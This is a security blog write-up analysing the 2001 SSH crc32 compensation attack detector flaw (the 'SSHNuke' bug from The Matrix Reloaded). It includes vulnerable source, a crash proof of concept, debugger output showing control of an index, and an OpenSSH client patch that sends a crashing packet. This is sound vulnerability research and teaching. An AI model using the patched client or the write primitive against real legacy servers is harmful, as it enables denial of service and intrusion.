!exploitable Episode Two - Enter the Matrix

Introduction

In case you are just tuning in, Doyensec has found themselves on a cruse ship touring the Mediterranean. Unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in the next couple weeks, will cover a web target. For this episode, we attempt to exploit one of the most famous vulnerabilities ever. SSHNuke from back in 2001. Better known as the exploit used by Trinity in the movie The Matrix Reloaded.

Trinity and SSHD

Some Quick History

Back in 1998 Ariel Futoransky and Emiliano Kargieman realized SSH’s protocol was fundamentally flawed, as it was possible to inject cipher text. So a crc32 checksum was added in order to detect this attack.

On February 8, 2001 Michal Zalewski posted to the Bugtraq mailing list an advisory named “Remote vulnerability in SSH daemon crc32 compensation attack detector” labeled CAN-2001-0144 (CAN aka CVE candidate) (ref). The “crc32” had a unique memory corruption vulnerability that could result in arbitrary code execution.

A bit after June, TESO Security released a statement regarding the leak of an exploit they wrote. This is interesting as it demonstrates that until June there was no reliable public exploit. TESO was aware of 6, private exploits, including their own.

Keep in mind, the first major OS level mitigation to memory corruption was not released until July of that year in the form of ALSR. A lack of exploits is likely due to the novelty of this vulnerability.

The Matrix Reloaded started filming March of 2001 and was released May of 2003. It’s impressive they picked such an amazing bug for the movie from one of the most well-known hackers of our day.

Trying it yourself

Building exploit environments is at best boring. At sea, with no Internet, trying to build a 20 year old piece of software is a nightmare. So while some of our team worked on that, we ported the vulnerability to a standalone main.c that anyone can easily build on any modern (or even old) system.

Feel free to grab it from github, compile with gcc -g main.c and follow along.

The Bug

This is your last chance to try and find the bug yourself. The core of the bug is in the following source code.

From: src/deattack.c:82 - 109

/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
	static u_int16_t *h = (u_int16_t *) NULL;
	static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE; // DOYEN 0x1000
	register u_int32_t i, j;
	u_int32_t l;
	register unsigned char *c;
	unsigned char *d;

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // DOYEN len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {              // DOYEN len % 8
		fatal("detect_attack: bad length %d", len);
	}
	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

	if (h == NULL) {
		debug("Installing crc compensation attack detector.");
		n = l;
		h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
	} else {
		if (l > n) {
			n = l;
			h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
		}
	}

This code is making sure the h buffer and its size n are managed properly. This code is crucial, as it runs every encrypted message. To prevent re-allocation, h and n are declared static. The xmalloc will initialize h with memory on the first call. Subsequent calls test if len is too big for n to handle - if so, a xrealloc occurs.

Have you discovered the bug? My first thought was an int overflow in xmalloc(n * HASH_ENTRYSIZE) or its twin xrealloc(h, n * HASH_ENTRYSIZE). This is wrong! These values can not be overflowed because of restrictions on n. These restrictions though, end up being the real vulnerability. I am curious if Zalewski took this path as well.

The variable n is declared early on (C99 spec) as a 16 bit value (static u_int32_t), while l is 32 bit (u_int32_t). So a potential int overflow occurs on n = l if l is greater than 0xffff. Can we get l big enough to overflow?

	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

This cryptic line is our only chance to set l. It initially sets l to n. Remember n represents our static size of h. So l is acting like a temp variable to see if n needs adjustment. Every time this for loop runs, l is bit shifted left by 2 (l << 2). This effectively multiplies l by 4 every iteration. We know l is initially 0x1000, so after a single loop it will be 0x4000. Another loop and it’s 0x10000. This 0x10000 value cast to a u_int16_t will overflow and result in 0. So all possible values of n are 0x1000, 0x4000 and 0. Any further iterations of the above loop will bitshift 0 to 0.

The loop runs when l < HASH_FACTOR(len / SSH_BLOCKSIZE). The HASH_FACTOR macro is just multiplying len by 3/2. So a bit of math lets us know that len needs to be 0x15560 or more, to loop twice. We can validate this with our main.c by adding the following code (or use the cheat branch of git repo).

int main() {
	size_t len = 0x15560; 

	unsigned char *buf = malloc (len);
	memset(buf, 'A', len);

    // call to vulnerable function
	int i = detect_attack(buf, len, NULL);
	free (buf);

	printf("returned %d\n", i);
	return 0;
}

Then debug it on our Mac using lldbg.

$ gcc -g main.c
$  lldb ./a.out
(lldb) target create "./a.out"
Current executable set to 'a.out' (arm64).
(lldb) source list -n detect_attack
File: main.c
...
   165  int
   166  detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
   167  {
   168          static u_int16_t *h = (u_int16_t *) NULL;
   169          static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
   170          register u_int32_t i, j;
   171          u_int32_t l;
(lldb)
   172          register unsigned char *c;
   173          unsigned char *d;
   174
   175          if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
   176              len % SSH_BLOCKSIZE != 0) {
   177                  fatal("detect_attack: bad length %d", len);
   178          }
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
   182          if (h == NULL) {
(lldb)
(lldb) b 182
Breakpoint 1: where = a.out`detect_attack + 200 at main.c:182:6, address = 0x0000000100003954
(lldb) r
Process 7691 launched: 'a.out' (arm64)
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003954 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAA....
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
-> 182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
Target 0: (a.out) stopped.
(lldb) p/x l
(u_int32_t) 0x00010000
(lldb) p/x l & 0xffff
(u_int32_t) 0x00000000
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003970 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAA...
   180                  ;
   181
   182          if (h == NULL) {
-> 183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003974 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAA...
   181
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
-> 184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003980 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
-> 185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
   188                          n = l;
Target 0: (a.out) stopped.
(lldb) p/x n
(u_int16_t) 0x0000

The last line above shows that n is 0 just after n = l. The reason this is important quickly becomes apparent if we continue the code.

(lldb) c
Process 7691 resuming
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x600082d68282)
    frame #0: 0x0000000100003c78 a.out`detect_attack(buf="AAAAA...
   215                  h[HASH(IV) & (n - 1)] = HASH_IV;
   216
   217          for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
-> 218                  for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
   219                       i = (i + 1) & (n - 1)) {
   220                          if (h[i] == HASH_IV) {
   221                                  if (!CMP(c, IV)) {
Target 0: (a.out) stopped.
(lldb) p/x i
(u_int32_t) 0x41414141
(lldb) p/x h[i]
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory

We got a crash showing our injected As as 0x41414141.

Just as we pass some nice islands.

First SSH Crash near Grease

The crash

The crash occurs because the check h[0x41414141] != HASH_UNUSED ([0] below) hit invalid memory.

From: src/deattack.c:135 - 153

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
		for (i = HASH(c) & (n - 1); h[i] /*<- [0]*/ != HASH_UNUSED;
		     i = (i + 1) & (n - 1)) {
			if (h[i] == HASH_IV) {
				if (!CMP(c, IV)) {
					if (check_crc(c, buf, len, IV))
						return (DEATTACK_DETECTED);
					else
						break;
				}
			} else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
				if (check_crc(c, buf, len, IV))
					return (DEATTACK_DETECTED);
				else
					break;
			}
		}
		h[i] = j; // [1] arbitrary write!!!
	}

What if h[i] was a readable offset? After some checks we would hit [1] where h[i] = j. Notice j is the number of iterations in the loop, we can control that with our buffer length. The i is our 0x41414141, we can control that. So we end up with a write-what-where primitive in a loop.

Crashing the real thing!

At this point we had a working OpenSSH server nicely set up. We need to send our buffer through SSH protocol 1. We couldn’t find an SSH python client that worked with such an outdated broken protocol. The intended solution was to patch out the OpenSSH crypto stuff to make it an easy socket connection. Instead we patched the OpenSSH client that came with the source code. It seems that the real exploit authors might have taken a similar approach.

Finding the patch location was easy with a little trick. Use gdb to break on the vulnerable detect_attack in the SSH server application. Then use gdb to debug the client connecting to the server. The server hangs on the breakpoint, causing the client to hang, waiting on a response to a packet. Ctrl+C in the client and we are at the response handler for the first vulnerable packet sent to the server. As a result we made the following patch.

From: sshconnect1.c:873 - 890

	{
		// DOYENSEC
		// Builds a packet to exploit server
		packet_start(SSH_MSG_IGNORE); // Should do nothing
		int dsize = 0x15560 - 0x10; // -0x10 b/c they add crc for us
		char *buf = malloc (dsize);
		memset(buf, 'A', dsize - 1);
		buf[dsize] = '\x00';
		packet_put_string(buf, dsize);
		packet_send();
		packet_write_wait();
	}

	/* Send the name of the user to log in as on the server. */
	packet_start(SSH_CMSG_USER);
	packet_put_string(server_user, strlen(server_user));
	packet_send();
	packet_write_wait();

Running this patched client got the same crash as in the case of main.c.

Where to go now…

It is important to understand this exploit primitive has a lot of weaknesses.

The h buffer is a u_int16_t *. On a little endian system, so you can’t write any arbitrary value to (char *)h + 0. Not unless you set the upper bits of j. To be able to set all the upper bits of j, you need to be able to loop 0x10000 times.

From: src/deattack.c:135

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {

The loop goes over 8 (SSH_BLOCKSIZE) bytes at a time to increment j once. We need a buffer of size 0x80000 to do that. The following check restricts us to write only half of all possible j values.

From: src/deattack.c:93 - 96

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {
		fatal("detect_attack: bad length %d", len);
	}

Further, if you want to write the same value to two locations, you have to call the vulnerable function twice without crashing. But once you caused the static n to be 0, it stays 0 on the next re-entry. This will cause the l bit shifting loop to loop infinitely. No matter how much it tries, bit shifting 0 wont make it big enough to handle your buffer length. You could bypass this by using your arbitrary write to set n to any value that has a single bit set (ie 0x1, 0x2, 0x4…). If you use any other values (ie 0x3), then the math for the loop may come out differently.

None of this even accounts for the challenges awaiting outside the detect_attack function. If the checksum fails, do you lose your session? What happens if the ciphertext, your buffer, fails to decrypt?

This all has an influence on what route you want to take to RCE. Trinity’s exploit overwrote the root password with a new arbitrary string. Maybe this was done by pointing the logger at /etc/passwd? Is there an advantage in this over shell code? What about breaking the authentication flow and just flipping an “is authenticated” bit from false to true? Could you overwrite a client public key in memory to have an RSA exponent of 0? So many fun options to try. Can you make an exploit that bypasses ALSR?

Conclusion

Our goal was to crash a patched OpenSSH. We exceeded our own expectations given the time and resources available, crashing with control, an unpatched OpenSSH. This is due to teamwork and creative time saves during the processes of exploitation. There was a ton of theory crafting throughout the processes that helped us avoid time sinks. Most of all, there was a lot of fun.